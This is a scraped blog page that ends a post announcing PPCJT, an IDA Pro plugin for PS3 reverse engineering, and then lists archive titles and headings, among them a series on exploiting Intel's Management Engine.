My personal suggestion, since IDA could screw up the analysis in its initial run, would be to completely undefine the file (Ctrl-PageUp + Alt-L + Ctrl-PageDown + U), then run the analyze_self.idc or analyze_sprx.idc.. it will take some time, but then you’ll get a beautiful file loaded 🙂 Especially with the correctly named imports, this should help a lot any reverse engineer out there!

p.s: If you have no idea what I’m talking about, then this is not for you, this does not lead to any ‘CFW’ or jailbreaking of 3.60 or whatever else you might hope for… so don’t come here and post stupid and/or irrelevant questions of that kind… please do not comment if you’re not a user of IDA or if you don’t know what IDA is or if you don’t have anything constructive to say.

PPCJT v0.1 for IDA v6.0.

Enjoy!

KaKaRoTo

KaKaRoTo's Blog

Open your communications!

Tag Archives: release

Exploiting Intel’s Management Engine – Part 3: USB hijacking (INTEL-SA-00086)

How to keylog? The basics.

Woah there, slow down!

IPCLib?

The XHCI Controller

How to keylog, really.

How about Skylake ?

Let’s do this!

Step 1 – Hardware setup

Step 2 – Software Setup

Step 3 – USB Listing (Apollolake)

Step 3 – USB Reset (Skylake/Kabylake)

A little extra mischief

Conclusion

Exploiting Intel’s Management Engine – Part 2: Enabling Red JTAG Unlock on Intel ME 11.x (INTEL-SA-00086)

Gathering the necessary information

The MFS filesystem

ROPs: Return Oriented Programming

IOSF Sideband

Back to ROP

OpenIPC

Thank you and you and you

Eleganz release for Cobra ODE

libnice 0.1.4 released!

Eleganz: The Elegant Homebrew Manager

UVC H264 Encoding cameras support in GStreamer

GstFilters library released!

Eskiss for PS3 with PS Move support

The Humble Homebrew Collection

PS3IDA Released!